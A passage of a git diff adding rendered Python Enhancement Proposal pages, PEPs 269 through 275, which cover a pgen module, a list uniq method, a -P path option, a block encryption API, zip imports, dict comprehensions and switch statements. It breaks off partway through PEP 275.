Source: https://github.com/python/peps/blob/main/peps/pep-0268.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0269/index.html b/pep-0269/index.html new file mode 100644 index 00000000000..7a6094f4988 --- /dev/null +++ b/pep-0269/index.html @@ -0,0 +1,328 @@ + + + + + + + + PEP 269 – Pgen Module for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 269 – Pgen Module for Python

+
+
Author:
+
Jonathan Riehl <jriehl at spaceship.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Much like the parser module exposes the Python parser, this PEP +proposes that the parser generator used to create the Python +parser, pgen, be exposed as a module in Python.

+
+
+

Rationale

+

Through the course of Pythonic history, there have been numerous +discussions about the creation of a Python compiler [1]. These +have resulted in several implementations of Python parsers, most +notably the parser module currently provided in the Python +standard library [2] and Jeremy Hylton’s compiler module [3]. +However, while multiple language changes have been proposed +[4] [5], experimentation with the Python syntax has lacked the +benefit of a Python binding to the actual parser generator used to +build Python.

+

By providing a Python wrapper analogous to Fred Drake Jr.’s parser +wrapper, but targeted at the pgen library, the following +assertions are made:

+
    +
  1. Reference implementations of syntax changes will be easier to +develop. Currently, a reference implementation of a syntax +change would require the developer to use the pgen tool from +the command line. The resulting parser data structure would +then either have to be reworked to interface with a custom +CPython implementation, or wrapped as a C extension module.
  2. +
  3. Reference implementations of syntax changes will be easier to +distribute. Since the parser generator will be available in +Python, it should follow that the resulting parser will +accessible from Python. Therefore, reference implementations +should be available as pure Python code, versus using custom +versions of the existing CPython distribution, or as compilable +extension modules.
  4. +
  5. Reference implementations of syntax changes will be easier to +discuss with a larger audience. This somewhat falls out of the +second assertion, since the community of Python users is most +likely larger than the community of CPython developers.
  6. +
  7. Development of small languages in Python will be further +enhanced, since the additional module will be a fully +functional LL(1) parser generator.
  8. +
+
+
+

Specification

+

The proposed module will be called pgen. The pgen module will +contain the following functions:

+
+

parseGrammarFile (fileName) -> AST

+

The parseGrammarFile() function will read the file pointed to +by fileName and create an AST object. The AST nodes will +contain the nonterminal, numeric values of the parser +generator meta-grammar. The output AST will be an instance of +the AST extension class as provided by the parser module. +Syntax errors in the input file will cause the SyntaxError +exception to be raised.

+
+
+

parseGrammarString (text) -> AST

+

The parseGrammarString() function will follow the semantics of +the parseGrammarFile(), but accept the grammar text as a +string for input, as opposed to the file name.

+
+
+

buildParser (grammarAst) -> DFA

+

The buildParser() function will accept an AST object for input +and return a DFA (deterministic finite automaton) data +structure. The DFA data structure will be a C extension +class, much like the AST structure is provided in the parser +module. If the input AST does not conform to the nonterminal +codes defined for the pgen meta-grammar, buildParser() will +throw a ValueError exception.

+
+
+

parseFile (fileName, dfa, start) -> AST

+

The parseFile() function will essentially be a wrapper for the +PyParser_ParseFile() C API function. The wrapper code will +accept the DFA C extension class, and the file name. An AST +instance that conforms to the lexical values in the token +module and the nonterminal values contained in the DFA will be +output.

+
+
+

parseString (text, dfa, start) -> AST

+

The parseString() function will operate in a similar fashion +to the parseFile() function, but accept the parse text as an +argument. Much like parseFile() will wrap the +PyParser_ParseFile() C API function, parseString() will wrap +the PyParser_ParseString() function.

+
+
+

symbolToStringMap (dfa) -> dict

+

The symbolToStringMap() function will accept a DFA instance +and return a dictionary object that maps from the DFA’s +numeric values for its nonterminals to the string names of the +nonterminals as found in the original grammar specification +for the DFA.

+
+
+

stringToSymbolMap (dfa) -> dict

+

The stringToSymbolMap() function output a dictionary mapping +the nonterminal names of the input DFA to their corresponding +numeric values.

+

Extra credit will be awarded if the map generation functions and +parsing functions are also methods of the DFA extension class.

+
+
+
+

Implementation Plan

+

A cunning plan has been devised to accomplish this enhancement:

+
    +
  1. Rename the pgen functions to conform to the CPython naming +standards. This action may involve adding some header files to +the Include subdirectory.
  2. +
  3. Move the pgen C modules in the Makefile.pre.in from unique pgen +elements to the Python C library.
  4. +
  5. Make any needed changes to the parser module so the AST +extension class understands that there are AST types it may not +understand. Cursory examination of the AST extension class +shows that it keeps track of whether the tree is a suite or an +expression.
  6. +
+
    +
  1. Code an additional C module in the Modules directory. The C +extension module will implement the DFA extension class and the +functions outlined in the previous section.
  2. +
  3. Add the new module to the build process. Black magic, indeed.
  4. +
+
+
+

Limitations

+

Under this proposal, would be designers of Python 3000 will still +be constrained to Python’s lexical conventions. The addition, +subtraction or modification of the Python lexer is outside the +scope of this PEP.

+
+
+

Reference Implementation

+

No reference implementation is currently provided. A patch +was provided at some point in +http://sourceforge.net/tracker/index.php?func=detail&aid=599331&group_id=5470&atid=305470 +but that patch is no longer maintained.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0269.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0270/index.html b/pep-0270/index.html new file mode 100644 index 00000000000..1c2a9e9d41a --- /dev/null +++ b/pep-0270/index.html @@ -0,0 +1,197 @@ + + + + + + + + PEP 270 – uniq method for list objects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 270 – uniq method for list objects

+
+
Author:
+
Jason Petrone <jp at demonseed.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
21-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Notice

+

This PEP is withdrawn by the author. He writes:

+
+
Removing duplicate elements from a list is a common task, but +there are only two reasons I can see for making it a built-in. +The first is if it could be done much faster, which isn’t the +case. The second is if it makes it significantly easier to +write code. The introduction of sets.py eliminates this +situation since creating a sequence without duplicates is just +a matter of choosing a different data structure: a set instead +of a list.
+

As described in PEP 218, sets are being added to the standard +library for Python 2.3.

+
+
+

Abstract

+

This PEP proposes adding a method for removing duplicate elements to +the list object.

+
+
+

Rationale

+

Removing duplicates from a list is a common task. I think it is +useful and general enough to belong as a method in list objects. +It also has potential for faster execution when implemented in C, +especially if optimization using hashing or sorted cannot be used.

+

On comp.lang.python there are many, many, posts [1] asking about +the best way to do this task. It’s a little tricky to implement +optimally and it would be nice to save people the trouble of +figuring it out themselves.

+
+
+

Considerations

+

Tim Peters suggests trying to use a hash table, then trying to +sort, and finally falling back on brute force [2]. Should uniq +maintain list order at the expense of speed?

+

Is it spelled ‘uniq’ or ‘unique’?

+
+
+

Reference Implementation

+

I’ve written the brute force version. It’s about 20 lines of code +in listobject.c. Adding support for hash table and sorted +duplicate removal would only take another hour or so.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0270.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0271/index.html b/pep-0271/index.html new file mode 100644 index 00000000000..eb8a320f86f --- /dev/null +++ b/pep-0271/index.html @@ -0,0 +1,187 @@ + + + + + + + + PEP 271 – Prefixing sys.path by command line option | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 271 – Prefixing sys.path by command line option

+
+
Author:
+
Frédéric B. Giacometti <fred at arakne.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

At present, setting the PYTHONPATH environment variable is the +only method for defining additional Python module search +directories.

+

This PEP introduces the ‘-P’ valued option to the python command +as an alternative to PYTHONPATH.

+
+
+

Rationale

+

On Unix:

+
python -P $SOMEVALUE
+
+
+

will be equivalent to:

+
env PYTHONPATH=$SOMEVALUE python
+
+
+

On Windows 2K:

+
python -P %SOMEVALUE%
+
+
+

will (almost) be equivalent to:

+
set __PYTHONPATH=%PYTHONPATH% && set PYTHONPATH=%SOMEVALUE%\
+   && python && set PYTHONPATH=%__PYTHONPATH%
+
+
+
+
+

Other Information

+

This option is equivalent to the ‘java -classpath’ option.

+
+
+

When to use this option

+

This option is intended to ease and make more robust the use of +Python in test or build scripts, for instance.

+
+
+

Reference Implementation

+

A patch implementing this is available from SourceForge:

+
http://sourceforge.net/tracker/download.php?group_id=5470&atid=305470&file_id=6916&aid=429614
+
+
+

with the patch discussion at:

+
http://sourceforge.net/tracker/?func=detail&atid=305470&aid=429614&group_id=5470
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0271.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0272/index.html b/pep-0272/index.html new file mode 100644 index 00000000000..235485952a4 --- /dev/null +++ b/pep-0272/index.html @@ -0,0 +1,357 @@ + + + + + + + + PEP 272 – API for Block Encryption Algorithms v1.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 272 – API for Block Encryption Algorithms v1.0

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
18-Sep-2001
+
Post-History:
+
17-Apr-2002, 29-May-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document specifies a standard API for secret-key block +encryption algorithms such as DES or Rijndael, making it easier to +switch between different algorithms and implementations.

+
+
+

Introduction

+

Encryption algorithms transform their input data (called +plaintext) in some way that is dependent on a variable key, +producing ciphertext. The transformation can easily be reversed +if and only if one knows the key. The key is a sequence of bits +chosen from some very large space of possible keys. There are two +classes of encryption algorithms: block ciphers and stream ciphers.

+

Block ciphers encrypt multibyte inputs of a fixed size (frequently +8 or 16 bytes long), and can be operated in various feedback +modes. The feedback modes supported in this specification are:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NumberConstantDescription
1MODE_ECBElectronic Code Book
2MODE_CBCCipher Block Chaining
3MODE_CFBCipher Feedback
5MODE_OFBOutput Feedback
6MODE_CTRCounter
+

These modes are to be implemented as described in NIST publication +SP 800-38A [1]. Descriptions of the first three feedback modes can +also be found in Bruce Schneier’s book Applied Cryptography [2].

+

(The numeric value 4 is reserved for MODE_PGP, a variant of CFB +described in RFC 2440: “OpenPGP Message Format”. This mode +isn’t considered important enough to make it worth requiring it +for all block encryption ciphers, though supporting it is a nice +extra feature.)

+

In a strict formal sense, stream ciphers encrypt data bit-by-bit; +practically, stream ciphers work on a character-by-character +basis. This PEP only aims at specifying an interface for block +ciphers, though stream ciphers can support the interface described +here by fixing ‘block_size’ to 1. Feedback modes also don’t make +sense for stream ciphers, so the only reasonable feedback mode +would be ECB mode.

+
+
+

Specification

+

Encryption modules can add additional functions, methods, and +attributes beyond those described in this PEP, but all of the +features described in this PEP must be present for a module to +claim compliance with it.

+

Secret-key encryption modules should define one function:

+
new(key, mode, [IV], **kwargs)
+
+
+

Returns a ciphering object, using the secret key contained in the +string ‘key’, and using the feedback mode ‘mode’, which must be +one of the constants from the table above.

+

If ‘mode’ is MODE_CBC or MODE_CFB, ‘IV’ must be provided and must +be a string of the same length as the block size. Not providing a +value of ‘IV’ will result in a ValueError exception being raised.

+

Depending on the algorithm, a module may support additional +keyword arguments to this function. Some keyword arguments are +specified by this PEP, and modules are free to add additional +keyword arguments. If a value isn’t provided for a given keyword, +a secure default value should be used. For example, if an +algorithm has a selectable number of rounds between 1 and 16, and +1-round encryption is insecure and 8-round encryption is believed +secure, the default value for ‘rounds’ should be 8 or more. +(Module implementors can choose a very slow but secure value, too, +such as 16 in this example. This decision is left up to the +implementor.)

+

The following table lists keyword arguments defined by this PEP:

+ + + + + + + + + + + + + + + + + +
KeywordMeaning
counterCallable object that returns counter blocks +(see below; CTR mode only)
roundsNumber of rounds of encryption to use
segment_sizeSize of data and ciphertext segments, +measured in bits (see below; CFB mode only)
+

The Counter feedback mode requires a sequence of input blocks, +called counters, that are used to produce the output. When ‘mode’ +is MODE_CTR, the ‘counter’ keyword argument must be provided, and +its value must be a callable object, such as a function or method. +Successive calls to this callable object must return a sequence of +strings that are of the length ‘block_size’ and that never +repeats. (Appendix B of the NIST publication gives a way to +generate such a sequence, but that’s beyond the scope of this +PEP.)

+

The CFB mode operates on segments of the plaintext and ciphertext +that are ‘segment_size’ bits long. Therefore, when using this +mode, the input and output strings must be a multiple of +‘segment_size’ bits in length. ‘segment_size’ must be an integer +between 1 and block_size*8, inclusive. (The factor of 8 comes +from ‘block_size’ being measured in bytes and not in bits). The +default value for this parameter should be block_size*8. +Implementors are allowed to constrain ‘segment_size’ to be a +multiple of 8 for simplicity, but they’re encouraged to support +arbitrary values for generality.

+

Secret-key encryption modules should define two variables:

+
    +
  • block_size

    An integer value; the size of the blocks encrypted by this +module, measured in bytes. For all feedback modes, the length +of strings passed to the encrypt() and decrypt() must be a +multiple of the block size.

    +
  • +
  • key_size

    An integer value; the size of the keys required by this +module, measured in bytes. If key_size is None, then the +algorithm accepts variable-length keys. This may mean the +module accepts keys of any random length, or that there are a +few different possible lengths, e.g. 16, 24, or 32 bytes. You +cannot pass a key of length 0 (that is, the null string ‘’) as +a variable-length key.

    +
  • +
+

Cipher objects should have two attributes:

+
    +
  • block_size

    An integer value equal to the size of the blocks encrypted by +this object. For algorithms with a variable block size, this +value is equal to the block size selected for this object.

    +
  • +
  • IV

    Contains the initial value which will be used to start a +cipher feedback mode; it will always be a string exactly one +block in length. After encrypting or decrypting a string, +this value is updated to reflect the modified feedback text. +It is read-only, and cannot be assigned a new value.

    +
  • +
+

Cipher objects require the following methods:

+
    +
  • decrypt(string)

    Decrypts ‘string’, using the key-dependent data in the object +and with the appropriate feedback mode. The string’s length +must be an exact multiple of the algorithm’s block size or, in +CFB mode, of the segment size. Returns a string containing +the plaintext.

    +
  • +
  • encrypt(string)

    Encrypts a non-empty string, using the key-dependent data in +the object, and with the appropriate feedback mode. The +string’s length must be an exact multiple of the algorithm’s +block size or, in CFB mode, of the segment size. Returns a +string containing the ciphertext.

    +
  • +
+

Here’s an example, using a module named ‘DES’:

+
>>> import DES
+>>> obj = DES.new('abcdefgh', DES.MODE_ECB)
+>>> plaintext = "Guido van Rossum is a space alien."
+>>> len(plaintext)
+34
+>>> obj.encrypt(plaintext)
+Traceback (innermost last):
+  File "<stdin>", line 1, in ?
+ValueError: Strings for DES must be a multiple of 8 in length
+>>> ciphertext = obj.encrypt(plain+'XXXXXX')   # Add padding
+>>> ciphertext
+'\021,\343Nq\214DY\337T\342pA\372\255\311s\210\363,\300j\330\250\312\347\342I\3215w\03561\303dgb/\006'
+>>> obj.decrypt(ciphertext)
+'Guido van Rossum is a space alien.XXXXXX'
+
+
+
+
+

References

+ +
+
+

Changes

+

2002-04: Removed references to stream ciphers; retitled PEP; +prefixed feedback mode constants with MODE_; removed PGP feedback +mode; added CTR and OFB feedback modes; clarified where numbers +are measured in bytes and where in bits.

+

2002-09: Clarified the discussion of key length by using +“variable-length keys” instead of “arbitrary-length”.

+
+
+

Acknowledgements

+

Thanks to the readers of the python-crypto list for their comments on +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0272.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0273/index.html b/pep-0273/index.html new file mode 100644 index 00000000000..cdbceadded2 --- /dev/null +++ b/pep-0273/index.html @@ -0,0 +1,361 @@ + + + + + + + + PEP 273 – Import Modules from Zip Archives | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 273 – Import Modules from Zip Archives

+
+
Author:
+
James C. Ahlstrom <jim at interet.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Oct-2001
+
Python-Version:
+
2.3
+
Post-History:
+
26-Oct-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds the ability to import Python modules +*.py, *.py[co] and packages from zip archives. The +same code is used to speed up normal directory imports +provided os.listdir is available.

+
+
+

Note

+

Zip imports were added to Python 2.3, but the final implementation +uses an approach different from the one described in this PEP. +The 2.3 implementation is SourceForge patch #652586 [1], which adds +new import hooks described in PEP 302.

+

The rest of this PEP is therefore only of historical interest.

+
+
+

Specification

+

Currently, sys.path is a list of directory names as strings. If +this PEP is implemented, an item of sys.path can be a string +naming a zip file archive. The zip archive can contain a +subdirectory structure to support package imports. The zip +archive satisfies imports exactly as a subdirectory would.

+

The implementation is in C code in the Python core and works on +all supported Python platforms.

+

Any files may be present in the zip archive, but only files +*.py and *.py[co] are available for import. Zip import of +dynamic modules (*.pyd, *.so) is disallowed.

+

Just as sys.path currently has default directory names, a default +zip archive name is added too. Otherwise there is no way to +import all Python library files from an archive.

+
+
+

Subdirectory Equivalence

+

The zip archive must be treated exactly as a subdirectory tree so +we can support package imports based on current and future rules. +All zip data is taken from the Central Directory, the data must be +correct, and brain dead zip files are not accommodated.

+

Suppose sys.path contains “/A/B/SubDir” and “/C/D/E/Archive.zip”, +and we are trying to import modfoo from the Q package. Then +import.c will generate a list of paths and extensions and will +look for the file. The list of generated paths does not change +for zip imports. Suppose import.c generates the path +“/A/B/SubDir/Q/R/modfoo.pyc”. Then it will also generate the path +“/C/D/E/Archive.zip/Q/R/modfoo.pyc”. Finding the SubDir path is +exactly equivalent to finding “Q/R/modfoo.pyc” in the archive.

+

Suppose you zip up /A/B/SubDir/* and all its subdirectories. Then +your zip file will satisfy imports just as your subdirectory did.

+

Well, not quite. You can’t satisfy dynamic modules from a zip +file. Dynamic modules have extensions like .dll, .pyd, and .so. +They are operating system dependent, and probably can’t be loaded +except from a file. It might be possible to extract the dynamic +module from the zip file, write it to a plain file and load it. +But that would mean creating temporary files, and dealing with all +the dynload_*.c, and that’s probably not a good idea.

+

When trying to import *.pyc, if it is not available then +*.pyo will be used instead. And vice versa when looking for *.pyo. +If neither *.pyc nor *.pyo is available, or if the magic numbers +are invalid, then *.py will be compiled and used to satisfy the +import, but the compiled file will not be saved. Python would +normally write it to the same directory as *.py, but surely we +don’t want to write to the zip file. We could write to the +directory of the zip archive, but that would clutter it up, not +good if it is /usr/bin for example.

+

Failing to write the compiled files will make zip imports very slow, +and the user will probably not figure out what is wrong. So it +is best to put *.pyc and *.pyo in the archive with the *.py.

+
+
+

Efficiency

+

The only way to find files in a zip archive is linear search. So +for each zip file in sys.path, we search for its names once, and +put the names plus other relevant data into a static Python +dictionary. The key is the archive name from sys.path joined with +the file name (including any subdirectories) within the archive. +This is exactly the name generated by import.c, and makes lookup +easy.

+

This same mechanism is used to speed up directory (non-zip) imports. +See below.

+
+
+

zlib

+

Compressed zip archives require zlib for decompression. Prior to +any other imports, we attempt an import of zlib. Import of +compressed files will fail with a message “missing zlib” unless +zlib is available.

+
+
+

Booting

+

Python imports site.py itself, and this imports os, nt, ntpath, +stat, and UserDict. It also imports sitecustomize.py which may +import more modules. Zip imports must be available before site.py +is imported.

+

Just as there are default directories in sys.path, there must be +one or more default zip archives too.

+

The problem is what the name should be. The name should be linked +with the Python version, so the Python executable can correctly +find its corresponding libraries even when there are multiple +Python versions on the same machine.

+

We add one name to sys.path. On Unix, the directory is +sys.prefix + "/lib", and the file name is +"python%s%s.zip" % (sys.version[0], sys.version[2]). +So for Python 2.2 and prefix /usr/local, the path +/usr/local/lib/python2.2/ is already on sys.path, and +/usr/local/lib/python22.zip would be added. +On Windows, the file is the full path to python22.dll, with +“dll” replaced by “zip”. The zip archive name is always inserted +as the second item in sys.path. The first is the directory of the +main.py (thanks Tim).

+
+
+

Directory Imports

+

The static Python dictionary used to speed up zip imports can be +used to speed up normal directory imports too. For each item in +sys.path that is not a zip archive, we call os.listdir, and add +the directory contents to the dictionary. Then instead of calling +fopen() in a double loop, we just check the dictionary. This +greatly speeds up imports. If os.listdir doesn’t exist, the +dictionary is not used.

+
+
+

Benchmarks

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CaseOriginal 2.2a3Using os.listdirZip UncompZip Compr
13.2 2.5 3.2->1.022.3 2.5 2.3->0.871.66->0.931.5->1.07
22.8 3.9 3.0->1.32Same as Case 1.
35.7 5.7 5.7->5.72.1 2.1 2.1->1.81.25->0.991.19->1.13
49.4 9.4 9.3->9.35Same as Case 3.
+

Case 1: Local drive C:, sys.path has its default value. +Case 2: Local drive C:, directory with files is at the end of sys.path. +Case 3: Network drive, sys.path has its default value. +Case 4: Network drive, directory with files is at the end of sys.path.

+

Benchmarks were performed on a Pentium 4 clone, 1.4 GHz, 256 Meg. +The machine was running Windows 2000 with a Linux/Samba network server. +Times are in seconds, and are the time to import about 100 Lib modules. +Case 2 and 4 have the “correct” directory moved to the end of sys.path. +“Uncomp” means uncompressed zip archive, “Compr” means compressed.

+

Initial times are after a re-boot of the system; the time after +“->” is the time after repeated runs. Times to import from C: +after a re-boot are rather highly variable for the “Original” case, +but are more realistic.

+
+
+

Custom Imports

+

The logic demonstrates the ability to import using default searching +until a needed Python module (in this case, os) becomes available. +This can be used to bootstrap custom importers. For example, if +“importer()” in __init__.py exists, then it could be used for imports. +The “importer()” can freely import os and other modules, and these +will be satisfied from the default mechanism. This PEP does not +define any custom importers, and this note is for information only.

+
+
+

Implementation

+

A C implementation is available as SourceForge patch 492105. +Superseded by patch 652586 and current CVS. [2]

+

A newer version (updated for recent CVS by Paul Moore) is 645650. +Superseded by patch 652586 and current CVS. [3]

+

A competing implementation by Just van Rossum is 652586, which is +the basis for the final implementation of PEP 302. PEP 273 has +been implemented using PEP 302’s import hooks. [1]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0273.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0274/index.html b/pep-0274/index.html new file mode 100644 index 00000000000..ccb9d4b5e26 --- /dev/null +++ b/pep-0274/index.html @@ -0,0 +1,245 @@ + + + + + + + + PEP 274 – Dict Comprehensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 274 – Dict Comprehensions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2001
+
Python-Version:
+
2.7, 3.0
+
Post-History:
+
29-Oct-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 202 introduces a syntactical extension to Python called the +“list comprehension”. This PEP proposes a similar syntactical +extension called the “dictionary comprehension” or “dict +comprehension” for short. You can use dict comprehensions in ways +very similar to list comprehensions, except that they produce +Python dictionary objects instead of list objects.

+
+
+

Resolution

+

This PEP was originally written for inclusion in Python 2.3. It +was withdrawn after observation that substantially all of its +benefits were subsumed by generator expressions coupled with the +dict() constructor.

+

However, Python 2.7 and 3.0 introduces this exact feature, as well +as the closely related set comprehensions. On 2012-04-09, the PEP +was changed to reflect this reality by updating its Status to +Accepted, and updating the Python-Version field. The Open +Questions section was also removed since these have been long +resolved by the current implementation.

+
+
+

Proposed Solution

+

Dict comprehensions are just like list comprehensions, except that +you group the expression using curly braces instead of square +braces. Also, the left part before the for keyword expresses +both a key and a value, separated by a colon. The notation is +specifically designed to remind you of list comprehensions as +applied to dictionaries.

+
+
+

Rationale

+

There are times when you have some data arranged as a sequences of +length-2 sequences, and you want to turn that into a dictionary. +In Python 2.2, the dict() constructor accepts an argument that is +a sequence of length-2 sequences, used as (key, value) pairs to +initialize a new dictionary object.

+

However, the act of turning some data into a sequence of length-2 +sequences can be inconvenient or inefficient from a memory or +performance standpoint. Also, for some common operations, such as +turning a list of things into a set of things for quick duplicate +removal or set inclusion tests, a better syntax can help code +clarity.

+

As with list comprehensions, an explicit for loop can always be +used (and in fact was the only way to do it in earlier versions of +Python). But as with list comprehensions, dict comprehensions can +provide a more syntactically succinct idiom that the traditional +for loop.

+
+
+

Semantics

+

The semantics of dict comprehensions can actually be demonstrated +in stock Python 2.2, by passing a list comprehension to the +built-in dictionary constructor:

+
>>> dict([(i, chr(65+i)) for i in range(4)])
+
+
+

is semantically equivalent to:

+
>>> {i : chr(65+i) for i in range(4)}
+
+
+

The dictionary constructor approach has two distinct disadvantages +from the proposed syntax though. First, it isn’t as legible as a +dict comprehension. Second, it forces the programmer to create an +in-core list object first, which could be expensive.

+
+
+

Examples

+
>>> print {i : chr(65+i) for i in range(4)}
+{0 : 'A', 1 : 'B', 2 : 'C', 3 : 'D'}
+
+
+
>>> print {k : v for k, v in someDict.iteritems()} == someDict.copy()
+1
+
+
+
>>> print {x.lower() : 1 for x in list_of_email_addrs}
+{'barry@zope.com'   : 1, 'barry@python.org' : 1, 'guido@python.org' : 1}
+
+
+
>>> def invert(d):
+...     return {v : k for k, v in d.iteritems()}
+...
+>>> d = {0 : 'A', 1 : 'B', 2 : 'C', 3 : 'D'}
+>>> print invert(d)
+{'A' : 0, 'B' : 1, 'C' : 2, 'D' : 3}
+
+
+
>>> {(k, v): k+v for k in range(4) for v in range(4)}
+... {(3, 3): 6, (3, 2): 5, (3, 1): 4, (0, 1): 1, (2, 1): 3,
+   (0, 2): 2, (3, 0): 3, (0, 3): 3, (1, 1): 2, (1, 0): 1,
+   (0, 0): 0, (1, 2): 3, (2, 0): 2, (1, 3): 4, (2, 2): 4, (
+   2, 3): 5}
+
+
+
+
+

Implementation

+

All implementation details were resolved in the Python 2.7 and 3.0 +time-frame.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0274.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0275/index.html b/pep-0275/index.html new file mode 100644 index 00000000000..1575d4c6fad --- /dev/null +++ b/pep-0275/index.html @@ -0,0 +1,481 @@ + + + + + + + + PEP 275 – Switching on Multiple Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 275 – Switching on Multiple Values

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
10-Nov-2001
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

A similar PEP for Python 3000, PEP 3103, was already rejected, +so this proposal has no chance of being accepted either.

+
+
+

Abstract

+

This PEP proposes strategies to enhance Python’s performance +with respect to handling switching on a single variable having +one of multiple possible values.

+
+
+

Problem

+

Up to Python 2.5, the typical way of writing multi-value switches +has been to use long switch constructs of the following type:

+
if x == 'first state':
+    ...
+elif x == 'second state':
+    ...
+elif x == 'third state':
+    ...
+elif x == 'fourth state':
+    ...
+else:
+    # default handling
+    ...
+
+
+

This works fine for short switch constructs, since the overhead of +repeated loading of a local (the variable x in this case) and +comparing it to some constant is low (it has a complexity of O(n) +on average). However, when using such a construct to write a state +machine such as is needed for writing parsers the number of +possible states can easily reach 10 or more cases.

+

The current solution to this problem lies in using a dispatch +table to find the case implementing method to execute depending on +the value of the switch variable (this can be tuned to have a +complexity of O(1) on average, e.g. by using perfect hash +tables). This works well for state machines which require complex +and lengthy processing in the different case methods. It does not +perform well for ones which only process one or two instructions +per case, e.g.

+
def handle_data(self, data):
+    self.stack.append(data)
+
+
+

A nice example of this is the state machine implemented in +pickle.py which is used to serialize Python objects. Other +prominent cases include XML SAX parsers and Internet protocol +handlers.

+
+
+

Proposed Solutions

+

This PEP proposes two different but not necessarily conflicting +solutions:

+
    +
  1. Adding an optimization to the Python compiler and VM +which detects the above if-elif-else construct and +generates special opcodes for it which use a read-only +dictionary for storing jump offsets.
  2. +
  3. Adding new syntax to Python which mimics the C style +switch statement.
  4. +
+

The first solution has the benefit of not relying on adding new +keywords to the language, while the second looks cleaner. Both +involve some run-time overhead to assure that the switching +variable is immutable and hashable.

+

Both solutions use a dictionary lookup to find the right +jump location, so they both share the same problem space in +terms of requiring that both the switch variable and the +constants need to be compatible to the dictionary implementation +(hashable, comparable, a==b => hash(a)==hash(b)).

+
+

Solution 1: Optimizing if-elif-else

+

Implementation:

+

It should be possible for the compiler to detect an +if-elif-else construct which has the following signature:

+
if x == 'first':...
+elif x == 'second':...
+else:...
+
+
+

i.e. the left hand side always references the same variable, +the right hand side a hashable immutable builtin type. The +right hand sides need not be all of the same type, but they +should be comparable to the type of the left hand switch +variable.

+

The compiler could then setup a read-only (perfect) hash +table, store it in the constants and add an opcode SWITCH in +front of the standard if-elif-else byte code stream which +triggers the following run-time behaviour:

+

At runtime, SWITCH would check x for being one of the +well-known immutable types (strings, unicode, numbers) and +use the hash table for finding the right opcode snippet. If +this condition is not met, the interpreter should revert to +the standard if-elif-else processing by simply skipping the +SWITCH opcode and proceeding with the usual if-elif-else byte +code stream.

+

Issues:

+

